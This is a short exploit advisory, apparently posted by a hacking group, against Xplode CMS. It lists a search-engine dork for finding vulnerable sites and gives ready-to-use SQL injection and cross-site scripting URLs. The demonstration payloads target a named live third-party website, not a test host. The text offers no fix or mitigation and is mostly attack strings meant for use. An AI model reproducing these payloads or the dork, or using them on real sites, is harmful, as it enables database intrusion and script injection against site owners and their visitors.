Xplode CMS suffers from cross site scripting and SQL injection vulnerabilities.
9948da7447b4357732d6ebea4862e6a123b17deabe3a413f0d8545ea5097d17f
#---------------------------------------------------------------------------------------------
# scriptname: Xplode Cms
#
# Xplode Multiple XSS/SQL Injection Vulnerabilities
#
# Author: PLATEN
#
# contact: PLATEN.Secure[at]Gmail.com
#
# web: Www.ata-turk.tk & www.deltahacking.net
#
# big tnx: Dr.Trojan ~ Cru3l.b0y ~ b3hz4d
#---------------------------------------------------------------------------------------------
dork: "Powered by Xplode CMS"
#----------------------------------------------------------------------------------------------
===[ SQL ]===
http://127.0.0.1/module_wrapper.asp?wrap_script=[sql]
example & demo:
http://www.snowawards.co.uk/module_wrapper.asp?wrap_script=1' and 1=convert(int,@@version)--
#----------------------------------------------------------------------------------------------
===[ XSS ]===
http://127.0.0.1/module_wrapper.asp?wrap_script=[xss code]
example & demo:
http://www.snowawards.co.uk:80/module_wrapper.asp?wrap_script=modules%2FSearch+results%2Fsearch%2Easp&SearchType=all&SearchString=>"><ScRiPt%20%0a%0d>alert(400191613824)%3B</ScRiPt>
#----------------------------------------------------------------------------------------------